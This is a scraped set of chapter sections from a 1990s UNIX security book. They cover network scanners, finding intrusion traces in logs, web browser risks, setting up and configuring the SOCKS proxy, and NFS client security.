written that can warn if a host has been scanned with SATAN.<br />

17.6.2 ISS<br />

The <strong>Internet</strong> <strong>Sec</strong>urity Scanner (ISS), is a smaller, more aggressive scanner than SATAN. It comes in two<br />

versions: a complex version that is sold commercially, and a freeware, stripped-down version. The<br />

commercial version is expensive, and we have no personal experience with it. However, we know people<br />

who have licensed the commercial version and use it frequently on their internal systems to check for<br />

problems.<br />

Authorities with various FIRST teams report that the majority of network break-ins and intrusions they<br />

handle begin with use of the ISS freeware scanner.<br />

17.6.3 PingWare<br />

PingWare is a scanning program marketed by Bellcore. It is allegedly based on a series of shell scripts<br />

and programs, and provides scanning that is not as comprehensive as ISS. We have no personal<br />

experience with this product, and we have had no report from anyone who has actually used it, so we<br />

cannot comment on it further.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_06.htm (1 of 2) [2002-04-12 10:45:43]


[Chapter 17] 17.6 Network Scanning<br />

17.5 Monitoring Your<br />

Network with netstat<br />

17.7 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_06.htm (2 of 2) [2002-04-12 10:45:43]


[Chapter 24] 24.3 The Log Files: Discovering an Intruder's Tracks<br />

Chapter 24<br />

Discovering a Break-in<br />

24.3 The Log Files: Discovering an Intruder's<br />

Tracks<br />

Even if you don't catch an intruder in the act, you still have a good chance of finding the intruder's tracks<br />

by routinely looking through the system logs. (For a detailed description of the <strong>UNIX</strong> log files, see<br />

Chapter 10, Auditing and Logging.) Remember: look for things out of the ordinary; for example:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Users logging in at strange hours<br />

Unexplained reboots<br />

Unexplained changes to the system clock<br />

Unusual error messages from the mailer, ftp daemon, or other network server<br />

Failed login attempts with bad passwords<br />

Unauthorized or suspicious use of the su command<br />

Users logging in from unfamiliar sites on the network<br />

On the other hand, if the intruder is sufficiently skillful and achieves superuser access on your machine,<br />

he or she may erase all evidence of the invasion. Simply because your system has no record of an<br />

intrusion in the log files, you can't assume that your system hasn't been attacked.<br />

Many intruders operate with little finesse: instead of carefully editing out a record of their attacks, they<br />

simply delete or corrupt the entire log file. This means that if you discover a log file deleted or containing<br />

corrupted information, there is a possibility that the computer has been successfully broken into.<br />

However, a break-in is not the only possible conclusion. Missing or corrupted logs might mean that one<br />

of your system administrators was careless; there might even be an automatic program in your system<br />

that erases the log files at periodic intervals.<br />

You may also discover that your system has been attacked if you notice unauthorized changes in system<br />

programs or in an individual user's files. This is another good reason for using something like the<br />

Tripwire tool to monitor your files for changes (see Chapter 9).<br />

If your system logs to a hardcopy terminal or another computer, you may wish to examine that log first,<br />

because you know that it can't have been surreptitiously modified by an attacker coming in by the<br />

telephone or network.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_03.htm (1 of 2) [2002-04-12 10:45:43]


[Chapter 24] 24.3 The Log Files: Discovering an Intruder's Tracks<br />

24.2 Discovering an Intruder 24.4 Cleaning Up After the<br />

Intruder<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_03.htm (2 of 2) [2002-04-12 10:45:43]


[Chapter 18] 18.5 Risks of Web Browsers<br />

Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.5 Risks of Web Browsers<br />

In addition to the threat of monitoring discussed earlier in this chapter, Web browsers themselves raise a<br />

number of security issues.<br />

18.5.1 Executing Code from the Net<br />

Most Web browsers can be configured so that certain "helper" applications are automatically run when<br />

files of particular type are downloaded from the net. Although this is a good way to provide extensibility,<br />

you should not configure your Web browser so that programs downloaded from the net are automatically<br />

executed. Doing so poses a profound risk, because it provides a way for outsiders to run programs on<br />

your computer without your explicit permission. (For example, a program could be embedded in an<br />

HTML page as an included "image.")<br />

In particular:<br />

●<br />

●<br />

Do not configure /bin/csh as a viewer for documents of type application/x-csh. (The same is true<br />

with other shells.)<br />

Do not configure your Web browser to automatically run spreadsheets or word processors, because<br />

most spreadsheets and word processors these days have the ability to embed executable code<br />

within their files. We have already seen several reported viruses that use Microsoft Word macros<br />

to spread.<br />

The exception to these hard and fast rules may be the Java programming language. The creators of Java<br />

have gone to great lengths to make sure that a program written in Java cannot harm the computer on<br />

which it is running. Whether or not the creators are correct remains to be seen. However, we have our<br />

doubts based on past experiences with complex software. As this book goes to press, there is no<br />

indication that Java has any significant protections against denial of service attacks. Also, as this book<br />

goes to press, several serious security bugs in Sun's and Netscape's implementations of Java have been<br />

reported.<br />

18.5.2 Trusting Your Software Vendor<br />

Most users run Web browsers that are provided by third parties with whom the user has no formal<br />

relationship or signed contract. Instead, users are asked to click buttons that say "ACCEPT" to signify<br />

their acceptance of the terms of a non-negotiable license agreement. These license agreements limit the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_05.htm (1 of 3) [2002-04-12 10:45:44]


[Chapter 18] 18.5 Risks of Web Browsers<br />

liability of the companies that distribute the software.<br />

Individuals and organizations using such software should carefully read the license agreements. They<br />

rarely do. In particular, consider these two clauses in the Netscape Navigator 2.02b license. Interestingly,<br />

these are the only two paragraphs of the Netscape license agreement that are in all capital letters. They<br />

must be important<br />

2. NETSCAPE MAKES NO REPRESENTATIONS ABOUT THE SUITABILITY OF<br />

THIS SOFTWARE OR ABOUT ANY CONTENT OR INFORMATION MADE<br />

ACCESSIBLE BY THE SOFTWARE, FOR ANY PURPOSE. THE SOFTWARE IS<br />

PROVIDED "AS IS" WITHOUT EXPRESS OR IMPLIED WARRANTIES, INCLUDING<br />

WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR<br />

PURPOSE OR NONINFRINGEMENT. THIS SOFTWARE IS PROVIDED<br />

GRATUITOUSLY AND, ACCORDINGLY, NETSCAPE SHALL NOT BE LIABLE<br />

UNDER ANY THEORY FOR ANY DAMAGES SUFFERED BY YOU OR ANY USER<br />

OF THE SOFTWARE. NETSCAPE WILL NOT SUPPORT THIS SOFTWARE AND<br />

WILL NOT ISSUE UPDATES TO THIS SOFTWARE.<br />

9. NETSCAPE OR ITS SUPPLIERS SHALL NOT BE LIABLE FOR (a) INCIDENTAL,<br />

CONSEQUENTIAL, SPECIAL OR INDIRECT DAMAGES OF ANY SORT, WHETHER<br />

ARISING IN TORT, CONTRACT OR OTHERWISE, EVEN IF NETSCAPE HAS BEEN<br />

INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR (b) FOR ANY CLAIM<br />

BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY<br />

TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT<br />

APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME<br />

STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR<br />

CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT<br />

APPLY TO YOU.<br />

What these paragraphs mean is that Netscape Communications disclaims any liability for anything that<br />

its Navigator software might do.[5] This means that the Navigator could scan your computer's disks for<br />

interesting information and send it, encrypted, to a Netscape Commerce Server, when it is sent an<br />

appropriate command. We don't think that Navigator actually has this code compiled into it, but we don't<br />

know, because Netscape has not published the source code for either its Navigator or Commerce Server.<br />

(Netscape is not alone in keeping its source code secret.)<br />

[5] We don't mean to pick on Netscape here. Other software comes with similar license<br />

agreements. Netscape is used merely as an illustrative example because of its popularity<br />

when this book was being written.<br />

We do know, however, that users have reported some security lapses in 2.0beta Navigator having to do<br />

with Netscape's Live Script, renamed Java Script, programming language. A feature in a beta version of<br />

the browser allowed any server to query the Web browser for the list of URLS that had been visited by<br />

the user.[6] As URLS can contain passwords, this posed serious security issues. Although this feature has<br />

been taken out of Navigator, it is possible that it could be reintroduced in the future through the use of a<br />

programming language such as Java.<br />

[6] This was reported by Scott Weston on the comp.privacy Usenet newsgroup on December<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_05.htm (2 of 3) [2002-04-12 10:45:44]


[Chapter 18] 18.5 Risks of Web Browsers<br />

1, 1995.<br />

Indeed, programming languages such as Java create a whole new layer of security issues. Java is a<br />

programming language that is designed to allow the downloading of applications over the World Wide<br />

Web. Java is designed to be secure: the programs are run on a virtual machine, and they are not run<br />

unless they are approved by a "verifier" on the Web browser. In the initial implementation of Java for<br />

Web browsers, programs written in Java are permitted to access the network or to touch the user's<br />

filesystem, but not both. Programs that can touch the filesystem are permitted to read any file, but only to<br />

write in a specially predetermined directory.<br />

Unfortunately, Java's current security model is rather restrictive, and it is therefore quite likely that users<br />

will demand a more open model that gives Java programs more access to a user's filesystems and the<br />

network. This will probably produce a new round of security problems.<br />

18.4 Avoiding the Risks of<br />

Eavesdropping<br />

18.6 Dependence on Third<br />

Parties<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_05.htm (3 of 3) [2002-04-12 10:45:44]


[Chapter 22] 22.4 SOCKS<br />

22.4 SOCKS<br />

Chapter 22<br />

Wrappers and Proxies<br />

SOCKS is a system that allows computers behind a firewall to access services on the <strong>Internet</strong>. The program allows you to centrally<br />

control how programs on your organization's network communicate with the <strong>Internet</strong>. With SOCKS, you can allow specific services<br />

to specific computers, disable access to individual hosts on the <strong>Internet</strong>, and log as much or as little as you want.<br />

SOCKS was originally written by David Koblas and Michelle Koblas. It has since been extended by Ying-Da Lee at NEC's Systems<br />

Laboratory, and a commercially supported version is available from NEC. The name SOCKS stands for "SOCK-et-S." According to<br />

the SOCKS FAQ, "it was one of those `development names' that never left."<br />

SOCKS consists of two parts:<br />

SOCKS server<br />

A program that is run on a host that can communicate directly with both the <strong>Internet</strong> and the internal computers on your<br />

network (e.g., the firewall's gate).<br />

SOCKS client programs<br />

Specially modified <strong>Internet</strong> client programs that know to contact the SOCKS server instead of sending requests directly to the<br />

<strong>Internet</strong>.<br />

The standard SOCKS distribution comes with client programs for finger, ftp, telnet, and whois. SOCKS also includes a library you<br />

can use to create other SOCKS clients at will. Furthermore, many programs, such as NCSA Mosaic, include provisions for using<br />

SOCKS to negotiate firewalls.<br />

SOCKS is available for most versions of <strong>UNIX</strong>, including SunOS, Sun Solaris, IRIX, Ultrix, HP-UX, AIX, Interactive Systems<br />

<strong>UNIX</strong>, OSF/1, NetBSD, <strong>UNIX</strong>Ware, and Linux. A version called PC SOCKS, by Cornell Kinderknecht, is available for Microsoft<br />

Windows. A Macintosh version is under development.<br />

22.4.1 What SOCKS Does<br />

The SOCKS client software works by replacing calls to the <strong>UNIX</strong> socket functions - connect(), getsocketname(), bind(), accept(),<br />

listen() and select() - with its own versions of these functions. In practice, this replacement is done by adding a few macro definitions<br />

to the CFLAGS in the Makefile of the program that is used to compile the network client program, and then linking the resulting<br />

program with the SOCKS library.<br />

When a SOCKS-modified client attempts to connect to a server on the <strong>Internet</strong>, the SOCKS library intercepts the connection attempt<br />

and instead opens up a connection to the SOCKS server. After the connection is established, the SOCKS client sends through the<br />

following information:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Version number<br />

Connect request command<br />

Port number to which the client requested to connect<br />

IP address to which the client requested to connect<br />

Username of the person initiating the request<br />

The SOCKS server then checks its access control list to see if the connection should be accepted or rejected. If the connection is<br />

accepted, the server opens up a connection to the remote machine and then relays all information back and forth. If the connection is<br />

rejected, the server disconnects from the client. This configuration is shown graphically in Figure 22.1.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (1 of 8) [2002-04-12 10:45:45]


[Chapter 22] 22.4 SOCKS<br />

Figure 22.1: : Using SOCKS for proxying<br />

SOCKS can also be used to allow computers behind a firewall to receive connections. In this case, a connection is opened to the<br />

SOCKS server, which in turn gets ready to accept connections from the <strong>Internet</strong>.<br />

SOCKS works only with TCP/IP; for UDP services (such as Archie), use UDP Relayer as described later in this chapter.<br />

22.4.2 Getting SOCKS<br />

Socks may be freely downloaded from the <strong>Internet</strong>. The address is:<br />

ftp://ftp.nec.com/pub/security/socks.cstc/<br />

http://www.socks.nec.com/<br />

If you operate two nameservers to hide information from the <strong>Internet</strong>, you will also need to download the file Rgethostbyname.c. This<br />

file contains a function that can be used to query multiple nameservers to resolve a hostname.<br />

There is a mailing list devoted to SOCKS and related issues. To join it, send the message "subscribe socks your-email-address" to<br />

majordomo@syl.dl.nec.com.<br />

NOTE: This section discusses SOCKS Version 4. At the time of this writing, SOCKS Version 5 was under<br />

development. New features in SOCKS 5 include strong authentication, authentication method negotiation, message<br />

integrity, message privacy, and support for UDP applications.<br />

22.4.3 Getting SOCKS Running<br />

After you have downloaded the system, you will need to follow these steps to get the system running:<br />

1.<br />

2.<br />

3.<br />

Unpack the SOCKS distribution.<br />

Decide whether you wish to have the SOCKS daemon started automatically when the system starts (boot time), or started by<br />

inetd when each SOCKS request is received.<br />

The advantage of having the daemon start automatically at system start-up is that the daemon will need to read its<br />

configuration file only once. Otherwise, the configuration file will have to be read each time a SOCKS connection is requested.<br />

We recommend that you have SOCKS started at boot time.<br />

Edit the file Makefile in the main SOCKS directory and the file include/socks.h to reflect the policy of your site. Be sure to edit<br />

the variables found in Table 22.4.<br />

Table 22.4: Variables<br />

Variable Location Purpose/Setting<br />

SOCKS_DEFAULT_SERVER include/socks.h Set with the hostname of the computer that hosts the sockd daemon.<br />

SOCKS_DEFAULT_NS include/socks.h Set if the clients inside your firewall cannot look up the IP addresses of<br />

external hosts.<br />

NOT_THROUGH_INETD include/socks.h Set if socksd will be started automatically at system boot.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (2 of 8) [2002-04-12 10:45:45]


[Chapter 22] 22.4 SOCKS<br />

4.<br />

5.<br />

6.<br />

7.<br />

8.<br />

9.<br />

10.<br />

11.<br />

12.<br />

13.<br />

SOCKS_CONF include/socks.h Location of the SOCKS configuration file for client machines.<br />

SOCKD_CONF include/socks.h Location of the SOCKS configuration file for the sockd daemon.<br />

MULTIHOMED_SERVER include/socks.h Set if sockd will be running on a multihomed server (a gate computer with<br />

two Ethernet ports).<br />

SOCKD_ROUTE_FILE include/socks.h Location of the SOCKS routing file, for use with multihomed servers.<br />

FACIST Makefile Causes SOCKS FTP client to log names of all files transferred.<br />

FOR_PS Makefile Causes sockd to display information about its current activity in the output<br />

from the ps command.<br />

SERVER_BIN_DIR Makefile Directory containing the sockd daemon.<br />

CLIENTS_BIN_DIR Makefile Directory containing the SOCKS client programs.<br />

Compile SOCKS with a suitable C compiler.<br />

Verify that sockd compiled properly and with the correct configuration by running sockd with the -ver option:<br />

% ./sockd -ver<br />

CSTC single-homed, stand-alone SOCKS proxy server version 4.2.<br />

Supports clients that use Rrcmd().<br />

%<br />

Become superuser.<br />

Install the SOCKS daemon in the location that you specified in the Makefile; you may be able to do this by typing "make<br />

install.server".<br />

Add the SOCKS service to your /etc/services file. It should look like this:<br />

socks 1080/tcp<br />

Now you need to set up the SOCKS configuration file. See the section called "The SOCKS Server Configuration File:<br />

/etc/sockd.conf below.<br />

If you decided to have SOCKS start automatically at system boot time, modify your boot configuration files (either by adding<br />

a few lines to /etc/rc.local or by creating a new file in /etc/rc2.d/). You can set the start-up by adding a few lines that look like<br />

this:<br />

# Start SOCKS server<br />

if [ -f /usr/etc/sockd ]; then<br />

(echo -n "sockd... ")<br />

>/dev/console<br />

/usr/etc/sockd >/dev/console 2>&1<br />

fi<br />

If you decided to have SOCKS start from inetd (and you probably don't want to do this), add this line to the /etc/inetd.conf file:<br />

socks stream tcp nowait nobody /usr/etc/sockd<br />

Start the sockd daemon manually, or reset inetd.<br />

Test the system.<br />

22.4.4 SOCKS and Usernames<br />

SOCKS permits you to allow or deny access to <strong>Internet</strong> services based on both IP address and the username of the person on the local<br />

network making the request. There are two ways that SOCKS can determine the username of a person on the internal network:<br />

1.<br />

2.<br />

Normally, a SOCKS client will send through the username of the person initiating the connection as part of the SOCKS<br />

protocol.<br />

SOCKS can also use the ident protocol. For more information, see the section "Identification Protocol (auth) (TCP Port 113)"<br />

in Chapter 17.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (3 of 8) [2002-04-12 10:45:45]


22.4.5 SOCKS Identification Policy<br />

The choice of identification policy is determined by the way in which the sockd program is invoked and by the /etc/sockd.conf<br />

configuration file.<br />

Normally, sockd is invoked with one of three options:<br />

sockd [-ver | -i | -I]<br />

These options have the following meanings:<br />

-ver<br />

-I<br />

-i<br />

[Chapter 22] 22.4 SOCKS<br />

Prints the sockd configuration information and exits.<br />

Forces SOCKS to use the ident protocol. Denies access to any client that is not running the ident protocol. Also denies access<br />

to clients for which the username returned by the ident protocol does not match the username provided by the SOCKS<br />

protocol.<br />

Less restrictive than -I. Denies access to clients when the username returned by the ident protocol is different from the<br />

username returned by the SOCKS protocol, but allows use of sockd by users who do not have ident running on their systems.<br />

The identification options -i and -I can be overridden by a statement in the SOCKS configuration file, /etc/sockd.conf.<br />

22.4.6 The SOCKS Server Configuration File: /etc/sockd.conf<br />

The sockd configuration file, /etc/sockd.conf, allows you to control which TCP/IP connections are passed by the sockd daemon. As<br />

the daemon usually runs on a computer that has access to both your organization's internal network and the <strong>Internet</strong>, the sockd.conf<br />

file controls, in part, which services are passed between the two.<br />

The sockd program doesn't know the difference between your internal and external networks. It simply receives connections,<br />

determines the parameters of the connections (username, source, requested destination, and TCP/IP service), then scans rules in the<br />

/etc/sockd.conf file to determine if the connections should be permitted or denied.<br />

The /etc/sockd.conf file is an ASCII text file. Each line consists of a rule to either allow connections or reject (deny) them. The sockd<br />

program scans the file from the first line to the last line until a match is found. When a match is found, the action specified by the line<br />

is followed.<br />

Lines in the /etc/sockd.conf file may be up to 1023 characters long. Each line has the following form:<br />

[allow | deny] [?=auth] [*=username(s)|filename(s)]<br />

source-address source-mask<br />

[destination-address destination-mask]<br />

[operator destination-port]<br />

[: shell-command]<br />

Fields are separated by spaces or tabs. If a number sign (#) is found on the line, everything after the number sign is assumed to be a<br />

comment, except as noted below.<br />

If an incoming TCP/IP connection does not match any of the lines in the /etc/sockd.conf configuration file, it is rejected.<br />

Here is an explanation of the fields:<br />

allow | deny<br />

Specifies whether a connection matching the rule on this line should be allowed or denied.<br />

?=auth<br />

If present, this field allows you to override the identification policy specified when the program was invoked. Specify "?=I" to<br />

cause sockd to reject the connection if the user on the client machine is not running ident, or if the name returned by ident is<br />

not the same as the username sent by the SOCKS client. Specify "?=i" to cause sockd to reject the connection if the name<br />

returned by ident is not the same as the name sent by the SOCKS client.<br />

*=username(s)|filename(s)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (4 of 8) [2002-04-12 10:45:45]


[Chapter 22] 22.4 SOCKS<br />

If present, causes the rule to match a particular username. You can also specify a filename, in which case the usernames are<br />

read out of the file (one username per line). Here are some examples:<br />

Username Result<br />

*=simsong Matches the user simsong.<br />

*=fred,julie Matches the users fred and julie.<br />

*=/etc/goodusers Matches anybody in the file /etc/goodusers.<br />

*=fred,/etc/goodusers Matches the user fred and all of the users in the file /etc/goodusers.<br />

source-address source-mask<br />

The address and mask allow you to specify a match for a single IP address or a range of addresses. The source-address may be<br />

either an IP address in the form hhh.iii.jjj.kkk or an <strong>Internet</strong> hostname; the source-mask must be an IP address mask in the form<br />

hhh.iii.jjj.kkk.<br />

The source-mask specifies which bits of the source-address should be compared with the actual address of the incoming IP<br />

connection. Thus, a source-mask of 0.0.0.0 will cause the rule to match any IP address, while a source-mask of<br />

255.255.255.255 will only allow for an exact match. These and other possibilities are explored in the table below:<br />

source-address source-mask Result<br />

18.80.0.1 255.255.255.255 Matches the host 18.80.0.1.<br />

204.17.190.0 255.255.255.0 Matches any host on the subnet 204.17.190.<br />

10.80.0.1 255.0.0.0 Matches any host on net 10.<br />

0.0.0.0 0.0.0.0 Matches every host on the <strong>Internet</strong>.<br />

operator destination-port<br />

These optional arguments allow you to specify a particular TCP service or a range of TCP/IP ports. For example, you can<br />

specify "le 1023" to select all of the <strong>UNIX</strong> "privileged" ports, or you can specify "eq 25" to specify the SMTP port. The<br />

following table lists all of the operators:<br />

operator Meaning<br />

eq Equal to<br />

neq Not equal to<br />

lt Less than<br />

le Less than or equal to<br />

gt Greater than<br />

ge Greater than or equal to<br />

: shell-command<br />

You can specify a command that will be executed when the line is matched. The command line is executed by the Bourne shell<br />

(/bin/sh). Before the line is executed, the following substitutions are made:<br />

Token Replaced With<br />

%A The fully qualified domain name (FQDN) of the client (the computer contacting sockd), if it can be determined; otherwise,<br />

the computer's IP address<br />

%a The IP address of the client<br />

%c The direction of the connection; replaced with connect if the client is attempting to make an outgoing connection, or bind if<br />

the client is waiting for an incoming connection<br />

%p The process ID of sockd<br />

%S The service name, if it can be determined from the /etc/services database; otherwise, the destination port number<br />

%s The destination port number<br />

%U The username reported by identd<br />

%u The username sent by the client program<br />

%Z The FQDN name of the destination host, if it can be determined; otherwise, the computer's IP address<br />

%z The IP address of the destination computer<br />

%% "%"<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (5 of 8) [2002-04-12 10:45:45]


[Chapter 22] 22.4 SOCKS<br />

Obviously, token expansions that require that sockd look up a value in a database (such as %A, %S, and %Z) will take longer to<br />

execute than token expansions that merely report an IP or port number (such as %a, %s and %z).<br />

This example command runs finger to determine the users on a particular computer, and then sends the results to the root account of<br />

the computer that is running sockd:<br />

/usr/ucb/finger @%A | /bin/mailx -s 'SOCKS: rejected %u@%A' root<br />

22.4.6.1 #NO_IDENTD and #BAD_ID<br />

In addition to the pattern matching described above, sockd allows you to specify rules that will match any computer contacting the<br />

sockd daemon which is not running the ident protocol, or for which the username returned by the ident protocol is different from the<br />

username provided in the initial sockd contact. These lines have the form:<br />

#NO_IDENTD: command<br />

#BAD_ID: command<br />

22.4.6.2 Example /etc/sockd.conf configuration files<br />

Here are some example lines from an /etc/sockd.conf configuration file. The configuration file is designed to protect an organization<br />

that has placed a set of <strong>UNIX</strong> workstations on IP subnet 204.99.90.<br />

deny<br />

204.99.90.0 255.255.255.0 204.99.90.0 255.255.255.0<br />

This initial rule disallows access to the internal network from internal computers using SOCKS. (Why tie up the SOCKS<br />

server if you don't need to?)<br />

allow<br />

0.0.0.0 0.0.0.0 204.99.90.100 255.255.255.255 eq 25<br />

Allows connections to port 25 (SMTP) of the machine 204.99.90.100. This allows incoming electronic mail to that network.<br />

allow<br />

204.99.90.100 255.255.255.255 0.0.0.0 0.0.0.0 eq 25<br />

Allows outgoing connections from the machine 204.99.90.100 to port 25 of any computer on the <strong>Internet</strong>. This rule allows the<br />

organization to send mail to outside computers.<br />

allow<br />

deny<br />

204.99.90.0 255.255.255.0 0.0.0.0 0.0.0.0<br />

Allows outgoing connections from any host on subnet 204.99.90 to any computer on the <strong>Internet</strong>. If you have this rule, the<br />

previous rule is unnecessary.<br />

0.0.0.0 0.0.0.0 204.99.90.255 255.255.255.000 eq 23 : \<br />

safe_finger @%A |/bin/mailx -s 'Telnet denied from %U/%A' root<br />

This rather complex rule denies any attempted login to the organization's internal network. In addition to stopping the logins, it also<br />

does a finger of the computer from where the attempt is coming and sends email to the root account of the computer running sockd.<br />

If the remote machine is running the ident protocol, the username will be sent as well.<br />

deny<br />

NOTE: Do not use reverse finger for logging contacts on the finger port (port 79). Otherwise, a loop may result, with<br />

two sockd daemons continually attempting to finger each other until they are manually shut down or the disks fill up.<br />

0.0.0.0 0.0.0.0 204.99.90.0 255.255.255.0<br />

Denies all other connections to the subnet 204.99.99. Strictly speaking, this rule is not necessary, as a connection that does not<br />

specifically match the "allow" rules above will be rejected.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (6 of 8) [2002-04-12 10:45:45]


[Chapter 22] 22.4 SOCKS<br />

22.4.7 SOCKS Client Configuration File: /etc/socks.conf<br />

Each client that wishes to use the sockd server must also have its own configuration file. The configuration file has a syntax that is<br />

similar to, but slightly different from, the syntax of the /etc/sockd.conf file.<br />

When a SOCKS client attempts to make an outgoing connection to another host on the <strong>Internet</strong>, or when it calls the Rbind() function<br />

to accept an incoming connection, the SOCKS library scans the /etc/socks.conf configuration file line by line, starting with the first<br />

line, until it finds a line that matches the requested connection. The library then performs the action that is specified in the file.<br />

Each line in the file can have the following form:<br />

deny [*=username(s)|filename(s)] destination-address destination-mask<br />

[operator destination-port]<br />

[: shell-command]<br />

direct [*=username(s)|filename(s)] destination-address destination-mask<br />

[operator destination-port]<br />

[: shell-command]<br />

sockd [@=serverlist] [*=username(s)|filename(s)]<br />

destination-address destination-mask<br />

[operator destination-port]<br />

[: shell-command]<br />

Most of these fields are similar to those in the /etc/sockd.conf file. The differences are described below:<br />

deny<br />

The deny operator specifies that a TCP/IP connection that matches the line should be denied. (Remember, even though this<br />

connection will prevent the SOCKS package from making a connection to the site in question, the user may still have the<br />

option of connecting to the site using a client program that has not been linked with the SOCKS library. Thus, the deny<br />

operator running on the client computer is not a substitute for a suitable firewall choke. For more information on firewalls, see<br />

Chapter 21, Firewalls.)<br />

direct<br />

The direct operator tells the SOCKS library that the TCP/IP connection should be sent directly through.<br />

sockd [@=serverlist]<br />

The sockd operator tells the SOCKS library that the TCP/IP connection should be sent to the sockd daemon, which presumably<br />

will then pass it through to the outside network.<br />

The name of the host that is running the sockd server is compiled into the SOCKS library. It may also be specified on the<br />

command line, the SOCKS_SERVER environment variable, or it may be specified in the /etc/socks.conf configuration file<br />

using the @ argument. More than one server may be specified by separating the names with a comma, such as:<br />

sockd @=socks1,socks2,sock3 0.0.0.0 0.0.0.0<br />

In SOCKS version 4.2, the servers are tried in the order in which they appear in the configuration file. Thus, you can specify different<br />

servers in different orders on different clients to distribute the load. (A more intelligent approach, though, would be for the servers to<br />

be tried in random order.)<br />

22.4.7.1 Example /etc/socks.conf file<br />

This simple configuration file, for an organization administrating the subnet 204.90.80, specifies that all connections to organization's<br />

internal subnet should go direct, while all connections to the outside network should go through the SOCKS server:<br />

direct 204.90.80.0 255.255.255.0<br />

sockd @=socks-server 0.0.0.0 0.0.0.0<br />

22.3 tcpwrapper 22.5 UDP Relayer<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (7 of 8) [2002-04-12 10:45:45]


[Chapter 22] 22.4 SOCKS<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_04.htm (8 of 8) [2002-04-12 10:45:45]


[Chapter 20] 20.3 Client-Side NFS <strong>Sec</strong>urity<br />

Chapter 20<br />

NFS<br />

20.3 Client-Side NFS <strong>Sec</strong>urity<br />

NFS can create security issues for NFS clients as well as servers. Because the files that a client mounts<br />

appear in the client's filesystem, an attacker who is able to modify mounted files can directly compromise<br />

the client's security.<br />

The primary system that NFS uses for authenticating servers is based on IP host addresses and<br />

hostnames. NFS packets are not encrypted or digitally signed in any way. Thus, an attacker can spoof an<br />

NFS client either by posing as an NFS server or by changing the data that is en route between a server<br />

and the client. In this way, an attacker can force a client machine to run any NFS-mounted executable. In<br />

practice, this ability can give the attacker complete control over an NFS client machine.<br />

At mount time, the <strong>UNIX</strong> mount command allows the client system to specify whether or not SUID files<br />

on the remote filesystem will be honored as such. This capability is one of the reasons that the mount<br />

command requires superuser privileges to execute. If you provide facilities to allow users to mount their<br />

own filesystems (including NFS filesystems as well as filesystems on floppy disks), you should make<br />

sure that the facility specifies the nosuid option. Otherwise, users might mount a disk that has a specially<br />

prepared SUID program that could cause you some headaches later on.<br />

NFS can also cause availability and performance issues for client machines. If a client has an NFS<br />

partition on a server mounted, and the server becomes unavailable (because it crashed, or because<br />

network connectivity is lost), then the client can freeze until the NFS server becomes available.<br />

Occasionally, an NFS server will crash and restart and - despite NFS's being a connectionless and<br />

stateless protocol - the NFS client's file handles will all become stale. In this case, you may find that it is<br />

impossible to unmount the stale NFS filesystem, and your only course of action may be to forcibly restart<br />

the client computer.<br />

Here are some guidelines for making NFS clients more reliable and more secure:<br />

●<br />

●<br />

●<br />

●<br />

Make sure that your computer is either an NFS server or an NFS client, but not both.<br />

If possible, do not allow users to log into your NFS server.<br />

Don't allow your NFS clients to mount NFS servers outside your organization.<br />

Minimize the number of NFS servers that each client mounts. A system is usually far more reliable<br />

and more secure if it mounts two hard disks from a single NFS server, rather than mounting<br />

partitions from two NFS servers.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_03.htm (1 of 2) [2002-04-12 10:45:45]


[Chapter 20] 20.3 Client-Side NFS <strong>Sec</strong>urity<br />

●<br />

If possible, disable the honoring of SUID files and devices on mounted partitions.<br />

20.2 Server-Side NFS<br />

<strong>Sec</strong>urity<br />

20.4 Improving NFS <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

